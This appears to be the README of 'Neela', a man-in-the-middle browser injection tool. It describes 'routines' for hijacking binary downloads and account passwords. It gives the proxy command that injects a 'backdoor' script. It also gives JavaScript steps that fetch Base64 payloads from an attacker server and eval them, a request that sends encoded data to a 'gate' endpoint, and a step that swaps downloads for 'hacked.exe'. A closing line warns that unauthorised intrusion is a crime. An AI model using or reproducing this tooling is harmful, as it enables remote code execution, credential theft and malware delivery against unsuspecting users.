Neela, MITM extension tools can execute a routine.
A routine is execution of multiple steps, for hijack download binary... hijack account password ... and more.
- express
- body-parser
- colors
- cookie-parser
- cookie-session
- dns
- ent
- express-session
- ip
- socket.io
- os
- request-ip
node neela.js
--proxy-module injectjs --js-url "http://SERV_IP:3000/backdoor"
-
Create folder on /exploit/routine
Create info file
{ "name": "Name routine", "step":[ {"name":"step1.neela"}, {"name":"step2.neela"} ] , "author": "Author" }
* Create step file exemple:
step1.neela
```javascript
alert('My first routine');
- set neela environement
var serveur_neela = '10.34.2.139'; // Serv ip.
var step_neela = 0; // step 0=1 1=2 ...
var routine_name = 'Routine_folder_name';
- Update end function
function end_neela(){
console.log('ok end');
var req = new XMLHttpRequest();
req.open('GET', 'http://'+serveur_neela+':3000/next/'+step_neela+'/'+routine_name, true);
req.onreadystatechange = function() {
if (req.readyState == XMLHttpRequest.DONE) {
eval(Base64.decode(req.responseText));
}
}
req.send(null);
}
- Get next step
end_neela();
var req = new XMLHttpRequest();
req.open('GET', 'http://SERV_IP:3000/gate/'+encoded, false);
req.send(null);
- Select replace_exe.neela routine
- Update /exploit/routine/exe/hacked.exe
reminder, infiltrate, monitor, computer system without authorization is a crime